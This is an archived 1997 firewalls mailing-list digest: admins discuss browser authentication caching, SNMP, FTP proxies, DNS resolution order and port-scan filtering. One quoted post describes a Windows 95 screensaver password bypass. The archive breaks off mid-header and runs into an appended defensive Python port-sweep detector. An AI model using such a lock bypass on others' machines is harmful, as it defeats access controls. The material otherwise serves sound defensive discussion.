Received: from cc:Mail by ccmailgw.biss.co.uk id AA853365838; Wed, 15 Jan 97 13:59:35 GMT
Date: Wed, 15 Jan 97 13:59:35 GMT
From: "Mike Hayden"
Message-Id: <9700158533.AA853365838@ccmailgw.biss.co.uk>
To: firewalls@GreatCircle.com
Subject: Int.Exp.3.0/3.01 Cacheing problems
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

When doing an "NT Domain" authenticated http browse through an Eagle 3.06 NT firewall, I experienced "bad password" caching problems when using Internet Explorer 3.0/3.01 as the browser. Despite trying browser refreshes, when deliberately entering a good NT username but a bad NT password, the "pop up" challenge continues to insist I am using a bad password, despite entering a good password on 2nd/3rd/4th retries, etc.

I then used Microsoft's SMS Network Monitor tool to capture http protocol traffic between the MAC address of my NT 4.0 Server hosted browser & the MAC address of the inside i/face of the Eagle NT firewall. This revealed that the uuencoded password info was always the same, i.e. the encoded bad password deliberately entered on the first attempt.

Has anyone else had the same probs. with IE 3.0/3.01? I did a test using Netscape Navigator 3.0 as the client browser, using the NT Domain auth. method at the firewall, and this worked a peach, so this seems to point the finger squarely at Microsoft..

Thanks in advance for your comments.
Michael Hayden {Inet UK Ltd}
mike_hayden@inetuk.wang.com

From firewalls-owner Wed Jan 15 23:35:51 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA02973 for firewalls-outgoing; Wed, 15 Jan 1997 16:51:48 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01926 for ; Wed, 15 Jan 1997 16:49:11 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08503; Wed, 15 Jan 1997 14:05:43 -0800
Received: from gatekeeper.mcimail.com(192.147.45.5) by mycroft via smap (V1.3mjr) id sma008491; Wed Jan 15 14:04:53 1997
Received: from mailgate.mcimail.com (mailgate.mcimail.com [166.40.135.3]) by gatekeeper.mcimail.com (8.6.12/8.6.10) with SMTP id WAA17038; Wed, 15 Jan 1997 22:01:05 GMT
Received: from mcimail.com by mailgate.mcimail.com id al02473; 15 Jan 97 22:05 WET
Date: Wed, 15 Jan 97 17:04 EST
From: Peter Ngo
To: firewalls , Phil Cox
Subject: Re: [INFO] Firewall monitoring tools != SNMP
Message-Id: <94970115220449/0007044148PJ1EM@MCIMAIL.COM>
X-MB-Info: Serial #: 191-30-2807 VERSION: 2.01H
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Phil,

SNMP is a standardized remote monitoring and management mechanism for network devices such as hubs, routers and bridges, as well as workstations and servers. Therefore, any SNMP-capable management station would be able to monitor and control any SNMP-capable network device. The idea is that you do not want someone from the OUTSIDE to be able to manage our network via SNMP. Hence, you should not allow SNMP to cross our firewall.
Peter

______________________________ Reply Separator _________________________________
Subject: [INFO] Firewall monitoring tools != SNMP
Author:  Phil Cox|INTERNET|pcc@stealth.ran.sandia.gov at MCIMAIL
Date:    1/9/97 6:30 AM

What tools (PD or Commercial) are available for monitoring a firewall for
performance/availability from a remote station, while NOT using SNMP?

-Phil

* Philip C. Cox            | Quote of the Day:                        *
* pcox@sandia.gov          | "Character : the decisions a person      *
* PAGER: (510) 355-5222    | makes when the choice is not             *
* VOICE: (510) 294-3149    | obvious."                                *

From firewalls-owner Wed Jan 15 23:40:10 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17513 for firewalls-outgoing; Wed, 15 Jan 1997 07:13:56 -0800 (PST)
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA17477 for ; Wed, 15 Jan 1997 07:13:28 -0800 (PST)
Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id JAA04230; Wed, 15 Jan 1997 09:13:19 -0600
Date: Wed, 15 Jan 1997 09:05:20 -0600 (CST)
From: Ron DuFresne
To: Michael Cruz
cc: palan@dataprep.com.my, Gunnar Ingvi Thorisson , firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU
Subject: Re: Re[2]: WIN'95 FLAW
In-Reply-To: <2dbeae10@bracco.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 14 Jan 1997, Michael Cruz wrote:

> I thought this was the FIREWALL mailing list.
>

See what happens when you think without asking permission first!

Later,

Ron DuFresne

> mike
>
> ______________________________ Reply Separator _________________________________
> Subject: Re: WIN'95 FLAW
> Author:  gunni@if.is (Gunnar Ingvi Thorisson) at *Internet*
> Date:    1/14/97 8:14 AM
>
> > > I juz encountered a security (I would call it) flaw in M$ Windows'95
> > > screensaver !! I don't know anyone of you encountered this or not but here
> > > it goes :
> > >
> > > If the Windows'95 Screen saver is active, you can break into without any
> > > password and all you have to do is : press the "windows" logo key (printed
> > > on the M$ keyboard) and there you are.
> > >
> > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> > > tried this with my own PC and my friends. It works.....try on your own PC.
>
> This does not work for me, I've not tried to switch over to the English
> keyboard yet (I'm using Icelandic).
>
> Gunni
> gunni@if.is
> gunni@coda.is
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Wed Jan 15 23:47:01 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17252 for firewalls-outgoing; Wed, 15 Jan 1997 07:08:42 -0800 (PST)
Received: from gatekeeper.paymentech.com (gatekeeper.paymentech.com [206.50.182.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA17221 for ; Wed, 15 Jan 1997 07:08:11 -0800 (PST)
Received: (from uucp@localhost) by gatekeeper.paymentech.com (8.7.4/8.6.12) id JAA02295; Wed, 15 Jan 1997 09:08:29 -0600 (CST)
Message-Id: <199701151508.JAA02295@gatekeeper.paymentech.com>
Received: from unknown(172.16.5.183) by gatekeeper.paymentech.com via smap (V1.3) id sma002287; Wed Jan 15 09:08:18 1997
From: "D. Todd Meckenstock"
To: "Todd Graham Lewis" , "Pilar Lavin Mera"
Cc:
Subject: Re: TIS FWtk + netscape
Date: Wed, 15 Jan 1997 09:06:37 -0600
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If you are using your web browser to do things like ftp://domain.com/pub, this
is actually implemented over the http protocol as an anonymous login and does
not use the ftp-proxy at all. If you need username/password sign-on to ftp
sites, you have to implement the ftp proxy. The following are some suggestions:

1. Create a user on the firewall which will be given to all internal ftp
   proxies (their IP address is logged, so extra security on the inside is not
   really needed.)
2. Assign the ftp-gw proxy to run at a different port in /etc/services
3. Make sure the startup script in /usr/local/etc/mgmt/rc for the ftp-gw
   process uses this new port.
4. Identify users by approved IP address in the /usr/local/etc/netperm-table.
   This way even though firewall access on the client machines all use the
   same username to connect to the firewall, only machines with approved IP
   addresses can get through.
5. This is an "inside" to "outside" strategy - meaning we do not allow people
   to connect from the Internet through our firewall to an ftp server.

Hope this helps!

-Todd
------------------------------------
D. Todd Meckenstock, Senior Director, New Technology
First USA Paymentech, Inc.
http://www.paymentech.com
e:toddmeck@onramp.net v:214-849-4460 f:214-849-4774

----------
> From: Todd Graham Lewis
> To: Pilar Lavin Mera
> Cc: firewalls@GreatCircle.COM
> Subject: Re: TIS FWtk + netscape
> Date: Tuesday, January 14, 1997 2:38 PM
>
> On Tue, 14 Jan 1997, Pilar Lavin Mera wrote:
>
> > My company has a network accessing the internet through a SUN Sparc
> > Station + Solaris 2.3 and we have installed the TIS FWtoolkit. Our
> > problem is that we cannot configure netscape to pass through the
> > ftp-proxy. Can anyone help us?
>
> I recommend using Squid for both anonymous ftp and web access.
>
> C.f.: http://www.nlanr.net/Squid
>
> __
> Todd Graham Lewis                               Linux!  Core Engineering
> Mindspring Enterprises       tlewis@mindspring.com  (800) 719 4664, x2804
>

From firewalls-owner Thu Jan 16 00:26:04 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA02763 for firewalls-outgoing; Wed, 15 Jan 1997 16:51:15 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01532 for ; Wed, 15 Jan 1997 16:48:09 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08962; Wed, 15 Jan 1997 14:58:52 -0800
Received: from danbury-usr3-2.nai.net(208.133.164.107) by mycroft via smap (V1.3mjr) id sma008953; Wed Jan 15 14:58:15 1997
Received: from boca.dsmith.nai.net (dsmith@localhost [127.0.0.1]) by boca.dsmith.nai.net (8.7.4/8.6.12) with ESMTP id RAA06484; Wed, 15 Jan 1997 17:57:21 -0500 (EST)
Message-Id: <199701152257.RAA06484@boca.dsmith.nai.net>
X-Mailer: exmh version 1.6.5 12/8/95
From: "David T. Smith"
To: zwobada@apogee-com.fr
cc: Firewalls@GreatCircle.COM
Subject: Re: DNS Proxy and Internal Root Name Server
In-reply-to: Your message of "Wed, 15 Jan 1997 21:07:57 +0100." <32DD391D.5A6A@apogee-com.fr>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 15 Jan 1997 17:57:17 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks for the tip -- I'll look at the #define to keep the cache clean and
pointing to the right servers.

DTS
--
//==========================================================\\
||David T. Smith                  | Specialists in          ||
||Tucker Network Technologies     | Network Computing       ||
||50 Washington St., PO 429       | --------------------    ||
||South Norwalk, CT 06856         | dsmith@tuckernet.com    ||
\\=========================================================//

In message <32DD391D.5A6A@apogee-com.fr>, Jean-Francois Zwobada writes:
>
>------------358E455512A711
>Content-Transfer-Encoding: 7bit
>Content-Type: text/plain; charset=us-ascii
>
>David T. Smith wrote:
>>
>>     We are looking at a solution similar to the one posted earlier where the
>> order of resolution is changed in the BIND code:  instead of resolution being
>> performed in the order
>>    1) authoritative,
>>    2) forwarded and
>>    3) cached,
>>  we believe that it may be useful to perform it in the order
>>    1) authoritative,
>>    2) cached, and
>>    3) forwarded
>> in the case of firewalled environments.
>>
>... D*mn, I missed your message till now...
>Sorry to respond so late.
>
>The problem with this is that the firewall will put additional records in its
>answer, thus telling you what are the Internet root servers. If you look at the cache
>before the forward option, you will ask them for information instead of the
>firewall DNS daemon...
>Well, to be honest, I think I have seen a #define directive dealing with the option
>to disable the adjunction of additional infos, but I am not sure at all.... :o)
>
>Regards
>
>JF
>--
>_____ Jean-Francois Zwobada (mailto:zwobada@apogee-com.fr) _______
>Apogee Communications - Parc Club Orsay Universite
>        - 28, rue Jean Rostand 91893 ORSAY Cedex
>Tel: +33 1 69.85.56.47
>Fax: +33 1 69.85.56.48
>___________ This guy is powered by a Z81 running CP/M ____________
>
>

From firewalls-owner Thu Jan 16 00:40:32 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA05977 for firewalls-outgoing; Wed, 15 Jan 1997 17:07:21 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA03635 for ; Wed, 15 Jan 1997 16:53:32 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id LAA06856; Wed, 15 Jan 1997 11:13:13 -0800
Received: from desvio.cnt.org.br(200.19.123.2) by mycroft via smap (V1.3mjr) id sma006844; Wed Jan 15 11:12:15 1997
Received: by trem.cnt.org.br (AIX 3.2/UCB 5.64/4.03) id AA08946; Wed, 15 Jan 1997 16:07:02 -0300
From: ormonde@trem.cnt.org.br (Rodrigo Ormonde)
Message-Id: <9701151907.AA08946@trem.cnt.org.br>
Subject: Re: Unix or NT
To: nvs2@cornell.edu
Date: Wed, 15 Jan 1997 16:07:01 -0300 (GRNLNDST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "nvs2@cornell.edu" at Jan 14, 97 01:52:04 pm
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Hi All,
> I am a Master's student in Comp. Sc. and my master's project is the
> design and implementation of a firewall. The basic question ahead of me
> is whether to implement the firewall on NT or on Unix.
> Now, I don't know the advantages / pitfalls of either approach and since
> this is just a project my school doesn't care.
>
> But, all the discussions I hear on this mailing list are mainly about Unix
> firewalls and all the books talk about Unix only. Does that mean that it
> is tough to get any material to build Unix software. Also is it easier to
> do it on Unix since everything is so easily available.
>
> I would greatly appreciate any advice that people would have.
>
> Thanx
> A very confused...
> Nik.

If you have the choice, implement it under Unix, or better, implement under a
free unix, like FreeBSD or Linux. The great advantage is that you have all the
sources of the kernel and of the utilities to learn and to use as a base to
implement your own firewall. Other advantage is that under unix it's easier to
get good documentation of anything you need, including the kernel. And at
last, what would you do if you have a technical question about your
implementation ? If you were doing it under a free unix it'd be easy to get
the answer: just send an e-mail to one of the many lists that exist about
them and quickly you'd get it. The same is not true for NT.

Well, that's only my opinion.
Cheers,

--
Rodrigo de La Rocque Ormonde
e-mail: ormonde@cnt.org.br
PGP Public key: finger ormonde@cnt.org.br

From firewalls-owner Thu Jan 16 00:56:26 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA06041 for firewalls-outgoing; Wed, 15 Jan 1997 17:09:24 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA03415 for ; Wed, 15 Jan 1997 16:52:54 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id MAA07608; Wed, 15 Jan 1997 12:11:28 -0800
Received: from firewall.apogee-com.fr(194.2.187.130) by mycroft via smap (V1.3mjr) id sma007605; Wed Jan 15 12:11:09 1997
Received: by dtcro002.apogee-com.fr; id VAA04637; Wed, 15 Jan 1997 21:13:00 +0100 (MET)
Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (3.2) id xma004635; Wed, 15 Jan 97 21:12:38 +0100
Received: from [10.132.24.6] by (4.1/SMI-4.1) id AA00690; Wed, 15 Jan 97 21:08:13 +0100
Message-Id: <32DD391D.5A6A@apogee-com.fr>
Date: Wed, 15 Jan 1997 21:07:57 +0100
From: Jean-Francois Zwobada
Reply-To: zwobada@apogee-com.fr
Organization: APOGEE Communications
X-Sender: Jean-Francois Zwobada
X-Mailer: Mozilla 4.0b1 (Win95; I)
Mime-Version: 1.0
To: "David T. Smith"
Cc: Firewalls@GreatCircle.COM
Subject: Re: DNS Proxy and Internal Root Name Server
X-Priority: Normal
References: <199701031425.JAA11930@boca.dsmith.nai.net>
Content-Type: multipart/alternative; boundary="----------358E455512A711"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

David T. Smith wrote:

>     We are looking at a solution similar to the one posted earlier where the
> order of resolution is changed in the BIND code:  instead of resolution being
> performed in the order
>    1) authoritative,
>    2) forwarded and
>    3) cached,
>  we believe that it may be useful to perform it in the order
>    1) authoritative,
>    2) cached, and
>    3) forwarded
> in the case of firewalled environments.

... D*mn, I missed your message till now...
Sorry to respond so late.

The problem with this is that the firewall will put additional records in its
answer, thus telling you what are the Internet root servers. If you look at the cache
before the forward option, you will ask them for information instead of the
firewall DNS daemon...
Well, to be honest, I think I have seen a #define directive dealing with the option
to disable the adjunction of additional infos, but I am not sure at all.... :o)
 
Regards
 
JF
-- 
_____ Jean-Francois Zwobada (mailto:zwobada@apogee-com.fr) _______
Apogee Communications - Parc Club Orsay Universite
        - 28, rue Jean Rostand 91893 ORSAY Cedex
Tel: +33 1 69.85.56.47  
Fax: +33 1 69.85.56.48
___________ This guy is powered by a Z81 running CP/M ____________
 
From firewalls-owner Thu Jan 16 17:24:36 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA16394 for firewalls-outgoing; Wed, 15 Jan 1997 19:18:35 -0800 (PST)
Received: from limbo.nwnet.net (limbo.nwnet.net [192.80.13.14]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA16378 for ; Wed, 15 Jan 1997 19:18:25 -0800 (PST)
Received: from limbo.nwnet.net (localhost [127.0.0.1]) by limbo.nwnet.net (8.7.6/8.7.3) with SMTP id TAA00626 for ; Wed, 15 Jan 1997 19:16:22 -0800
Message-ID: <32DD9D86.7DCA3C6F@nwnet.net>
Date: Wed, 15 Jan 1997 19:16:22 -0800
From: myles
X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.27 i586)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: filtering w/ state & "smarts"
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi All,

I'm trying to come up with a way to filter on things like this:

  If a remote host connects to more than X different ports on my machine in
  less than 1 minute, block connections from that host.

So far the ways I've found or thought of to do this are

1) sf firewall on linux does this, but isn't commercially supported, and is
   pretty new.
2) Checkpoint FW-1's INSPECT language should be capable of doing this, but I
   can't find any way to set a variable for number of connections, or find
   the size of an array full of connections.
3) Clever use of syslog records. I like this idea, since it works on many
   different kinds of routers and firewalls. Given perl & time I could
   probably do this, but I'd be amazed if I wasn't re-inventing the wheel.
   It's also either hard or dangerous to have the syslog-parsing programs
   insert a new rule in the firewalling program.
4) filtering on some threshold number of connections should be possible.
   (but isn't on most products). This isn't a very good solution if it stops
   your mail traffic.

Can anybody add other ways of doing this filtering, &/or products I've
missed? If anybody has a way of improving syslogging of attack signatures
like this, I'd welcome that as well.

thanks
myles

From firewalls-owner Thu Jan 16 17:49:45 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA15594 for firewalls-outgoing; Wed, 15 Jan 1997 19:03:38 -0800 (PST)
Received: from halon.sybase.com (halon.sybase
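One way to prototype option 3 of myles' post (an added example, not code from the post or from any product named in it): a Python sliding-window detector over constructed packet-filter syslog lines that flags a source touching more than a set number of distinct destination ports inside 60 seconds, skips expected service ports so mail traffic is never counted, and reports to an operator instead of inserting rules. The log line format, thresholds, hostnames and addresses are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample syslog lines (not real traffic), loosely modelled on a
# packet-filter log ending in "TCP <src>:<sport> <dst>:<dport>".
SAMPLE_LOG = """\
Jan 15 19:16:01 gw kernel: IP fw-in deny eth0 TCP 10.1.2.3:40001 192.168.1.5:21
Jan 15 19:16:03 gw kernel: IP fw-in deny eth0 TCP 10.1.2.3:40002 192.168.1.5:23
Jan 15 19:16:05 gw kernel: IP fw-in deny eth0 TCP 10.1.2.3:40003 192.168.1.5:25
Jan 15 19:16:07 gw kernel: IP fw-in deny eth0 TCP 10.1.2.3:40004 192.168.1.5:79
Jan 15 19:16:09 gw kernel: IP fw-in deny eth0 TCP 10.1.2.3:40005 192.168.1.5:110
Jan 15 19:16:11 gw kernel: IP fw-in deny eth0 TCP 10.1.2.3:40006 192.168.1.5:111
Jan 15 19:16:20 gw kernel: IP fw-in accept eth0 TCP 172.16.9.9:1025 192.168.1.5:25
Jan 15 19:18:20 gw kernel: IP fw-in accept eth0 TCP 172.16.9.9:1026 192.168.1.5:25
Jan 15 19:30:00 gw kernel: IP fw-in deny eth0 TCP 10.9.9.9:2000 192.168.1.5:21
Jan 15 19:31:30 gw kernel: IP fw-in deny eth0 TCP 10.9.9.9:2001 192.168.1.5:23
"""
LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ .*?TCP "
                     r"(\d+(?:\.\d+){3}):\d+ \d+(?:\.\d+){3}:(\d+)\s*$")
WINDOW_SECONDS = 60           # "in less than 1 minute"
DISTINCT_PORT_THRESHOLD = 4   # flag a source touching MORE THAN this many ports
EXEMPT_PORTS = {25}           # expected service traffic (mail) is never counted

def detect_port_sweeps(log_text, window=WINDOW_SECONDS,
                       threshold=DISTINCT_PORT_THRESHOLD, exempt=EXEMPT_PORTS):
    """Return {source_ip: timestamp at which it first exceeded `threshold`
    distinct destination ports within `window` seconds}.  Lines are assumed
    to arrive in chronological order, as syslog writes them."""
    recent = defaultdict(deque)   # src -> deque of (time, dport), oldest first
    flagged = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue              # some unrelated syslog record
        stamp, src, dport = m.group(1), m.group(2), int(m.group(3))
        if dport in exempt or src in flagged:
            continue
        # syslog has no year; strptime's default (1900) is fine for deltas
        ts = datetime.strptime(stamp, "%b %d %H:%M:%S")
        q = recent[src]
        q.append((ts, dport))
        while (ts - q[0][0]).total_seconds() >= window:
            q.popleft()           # drop entries that fell out of the window
        if len({p for _, p in q}) > threshold:
            flagged[src] = stamp
    return flagged

def block_recommendations(flagged):
    """Report to an operator instead of rewriting filter rules automatically
    (the post notes that doing so from a log parser is hard or dangerous)."""
    return ["%s: %s exceeded the port threshold; consider blocking it"
            % (stamp, src) for src, stamp in sorted(flagged.items())]
```

On the constructed log, `block_recommendations(detect_port_sweeps(SAMPLE_LOG))` reports only 10.1.2.3 at 19:16:11; the mail client on port 25 and the slow two-port probe spread over 90 seconds stay below the threshold.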